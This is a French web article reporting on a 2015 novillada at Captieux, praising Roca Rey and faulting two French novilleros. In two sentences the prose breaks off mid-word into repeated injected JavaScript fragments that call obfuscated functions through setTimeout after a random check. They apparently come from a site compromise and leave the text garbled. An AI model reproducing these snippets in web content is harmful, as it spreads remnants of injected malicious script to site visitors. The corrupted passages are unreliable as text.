CAPTIEUX 2015 : ROCA REY S’IMPOSE

Une nouvelle fois le novillero péruvien a été éblouissant. Ce fut dimanche dernier à Captieux, des arènes du sud ouest où il débuta juste un an auparavant en piquée. Le public s’est rendu à lui, ému par son toreo de cape extrêmement beau, au trait toujours élégant et surtout avec un tempo bien rythmé, subjuguant par sa lenteur. Quelles véroniques de réception aussi lentes et caressantes, prélude de suertes variées avec une tauromachie toujours vaillante, comme ces chicuelinas au ralenti amenant le toro au cheval. Il affronta deux novillos de El Pilar auxquels il s’adapta sans préambules à la muleta, à la distance adéquate, avec les toques opportuns, le leurre jamais accroché. L’enchaînement fut immédiat, avec des passes ininterrompues et parfois profondes, sur les deux cornes, changements de mains inclus. Il coupa les deux oreilles à son premier et aurait coupé les deux du dernier de la course s’il n’avait eu recours au descabello. Prestation à fort impact, celle d’un novillero aguerri, prêt à franchir le pas et rivaliser avec tout le monde.

Les deux novilleros français ont été très en dessous du bétail qui leur échut. Il est vrai que Lilian Ferrani affronta le seul novillo sans classe du lot, un manso intégral et faiblard sorti en premier, mais il ne profita en aucun cas de la noblesse de son second et son toreo indifféra le public. Il se montra volontaire mais sans goût et un peu rudimentaire. Le novillero de Dax, Louis Husson, affronta un excellent novillo, le cinquième, qui lui offrit des charges, longues, répétées, en « faisant l’avion » comme l’on dit dans le jargon taurin. Il n’en tira pas grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and-chose, son toreo fut décousu et souvent à contretemps.

Signalons pour finir qu’une fois encore la novillada de Captieux a été une réussite, chapeau à Michel Bertrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and, l’organisateur, qui en quelques jours a su trouver en cette époque de l’année un lot pour remplacer celui de Joselito, mis en quarantaine. Il a amené une novillada de El Pilar sérieuse de présentation, mais sans excès, en accord avec le caractère de ces arènes. Des novillos qui afficheraient plus tard de la qualité, de très bonne note. Le sixième fit un tour de piste posthume et le cinquième l’aurait mérité tout autant, si ce n’est plus.

Les commentaires sont fermés.